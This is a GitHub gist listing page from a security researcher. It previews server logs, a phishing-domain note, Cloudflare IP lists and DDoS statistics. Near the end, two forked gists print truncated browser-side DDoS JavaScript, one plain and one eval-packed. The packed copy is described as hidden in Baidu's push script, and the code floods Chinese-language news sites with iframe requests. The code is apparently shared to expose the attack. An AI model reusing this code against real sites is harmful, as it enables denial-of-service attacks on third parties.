Skip to content

Instantly share code, notes, and snippets.

View xxdesmus's full-sized avatar

Justin xxdesmus

69 followers · 14 following
View GitHub Profile
@xxdesmus
xxdesmus / gist:bd7bdcbcc172e7049d1e16b04e508b88
Created July 16, 2016 03:35
Should In-House Lawyers Use Slack?
The workplace messaging service Slack is generating lots of buzz these days, with The New York Times declaring it the “app that may finally sink email.” But should legal departments use the software? Some general counsel say that giving advice over a chat platform isn’t much different than email. But other legal department leaders are approaching Slack cautiously, citing concerns over privacy and a general preference to give legal advice face-to-face.
Slack and other messaging apps, which allow real-time chat among employees throughout the workday, have gained popularity in the workplace in the past few years. Like email, the technology can also archive and search conversations. In addition to Slack, big players in the space include HipChat, Yammer (a Microsoft subsidiary) and Google Hangouts.
Ken Carter, the general counsel of the San Francisco-based web performance and security company CloudFlare Inc., said that for security reasons his team prefers HipChat. Companies t
@xxdesmus
xxdesmus / out.txt
Last active August 19, 2016 04:05
/var/log/nginx/access.log:XForwardedFor: 91.121.31.52 RemoteAddr: 91.121.31.52 LocalTime: [18/Aug/2016:23:36:50 -0400] Host: canhazip.com Request: "POST /login/?login_only=1 HTTP/1.1" Status: 405 BodyBytes: 166 Referer: "-" UA: "Railgun/5.3.0" Country: FR RequestLength: "417" RayID: 2d4a9044ec7c2bf4-AMS
/var/log/nginx/access.log:XForwardedFor: 91.121.31.52 RemoteAddr: 91.121.31.52 LocalTime: [18/Aug/2016:23:36:52 -0400] Host: canhazip.com Request: "POST /login/?login_only=1 HTTP/1.1" Status: 405 BodyBytes: 166 Referer: "-" UA: "Railgun/5.3.0" Country: FR RequestLength: "417" RayID: 2d4a904cb53500dd-AMS
/var/log/nginx/access.log:XForwardedFor: 91.121.31.52 RemoteAddr: 91.121.31.52 LocalTime: [18/Aug/2016:23:36:55 -0400] Host: canhazip.com Request: "POST /login/?login_only=1 HTTP/1.1" Status: 405 BodyBytes: 166 Referer: "-" UA: "Railgun/5.3.0" Country: FR RequestLength: "417" RayID: 2d4a9060e5e92c4e-AMS
/var/log/nginx/access.log:XForwardedFor: 91.121.31.52 RemoteAddr: 91.121.31.52 LocalTime: [18/Aug/2016:23:
@xxdesmus
xxdesmus / 192.175.111.254.txt
Last active September 20, 2016 02:34
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
@xxdesmus
xxdesmus / producteev{.}io_Phish.txt
Last active September 24, 2016 20:33
producteev{.}io phishing email
producteev{.}com is the real domain. This email references producteev{.}io
Domain Name: PRODUCTEEV{.}COM
Registrar: DOMAIN.COM, LLC
Sponsoring Registrar IANA ID: 886
Whois Server: whois.domain.com
Referral URL: http://www.domain.com
Name Server: NS-1234.AWSDNS-26.ORG
Name Server: NS-1604.AWSDNS-08.CO.UK
Name Server: NS-473.AWSDNS-59.COM
@xxdesmus
xxdesmus / gist:eccab7459a436999a90faafa0e3eeec7
Created September 28, 2016 04:25
curl -s https://www.cloudflare.com/ips-v4/ | grep -v pre
103.22.200.0/22
103.31.4.0/22
104.16.0.0/12
108.162.192.0/18
131.0.72.0/22
141.101.64.0/18
162.158.0.0/15
172.64.0.0/13
173.245.48.0/20
@xxdesmus
xxdesmus / Amplification-type-count.txt
Last active October 19, 2016 20:00
Amplification type count -> February 2016 - October 2016
Type | Count
---------------------------
NTP | 3,749,953,101
unknown | 381,814,150
DNS | 191,622,518
Invalid | 123,173,586
CHARGEN | 93,040,586
SSDP | 10,546,205
QOTD | 365,421
@xxdesmus
xxdesmus / gist:336af4b717fdb719f20e9ef284c2249a
Created January 13, 2017 20:42
############
## Google ##
############
$ for i in {1..10}; do dig @8.8.8.8 canhazip.com | grep "Query time"; done
;; Query time: 54 msec
;; Query time: 59 msec
;; Query time: 45 msec
;; Query time: 20 msec
;; Query time: 20 msec
@xxdesmus
xxdesmus / cloudflare-ipset.sh
Created March 30, 2017 19:28 — forked from KiNgMaR/cloudflare-ipset.sh
Cloudflare IPTABLES and IPSET scripts
#/bin/sh
# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-
# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
local ipv
local inetv
@xxdesmus
xxdesmus / mingjingtimes-ddos-code.js
Created August 23, 2017 17:01 — forked from nczz/mingjingtimes-ddos-code.js
明鏡時報惡意大量請求攻擊程式碼
if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
var MAX_TIME = 300000;
var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
var MAX_COUNT = 100000000;
var TIMEGAP = 500;
var THREAD = 10;
var START_CLOCK = 1;
function unixtime() {
var dt = new Date();
@xxdesmus
xxdesmus / ddos-from-baidu.js
Created August 23, 2017 17:02 — forked from nczz/ddos-from-baidu.js
百度在主動推送網址的方法中藏有惡意原碼
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b((/X\\/([\\d]+)/Z.19(i.K.M.H())[1]>=1b)&&(i.K.M.H().1a("16")<0)){3 D=T;3 p=[\'n://13.q.m/\',\'n://15.q.m/\',\'n://14.q.m/\',\'n://11.12.m/\'];3 E=17;3 k=18;3 O=10;3 s=1;h w(){3 8=e 7();A 7.S(8.Y(),8.W(),8.U(),8.V(),8.I(),8.J())/R}g.z("B")[0].F="<1r 1s=\\"y\\" 1q=\\"1o-y\\">"+g.z("B")[0].F;3 9=[];3 f=[];3 x=5;3 c=[];3 a=[];3 r=\'\';3 l=0;h o(2){3 6=9[2];b(6!=5){g.G.1p(6)}9[2]=5;b(l<E&&a[2]-x<D){Q(\'u(\'+2+\')\',(a[2]-c[2])>k?k:(a[2]-c[2]))}}h L(2){b(9[2]==5){A}b(9[2].1x){i.C(f[2]);a[2]=e 7().j();o(2)}1v{b(e 7().j()-c[2]>k){i.C(f[2]);o(2)}}}h u(2){6=g.G.1t(g.1w(\'1u\'));r=p[w()%p.1n];6.1f=r+\'?t=\'+w()+P.1e(P.1c()*1d);6.1h.1l=\'1m\';9[2]=6;c[2]=a[2]=e 7().j();f[2]=1k("L("+2+")",1i);l=l+1}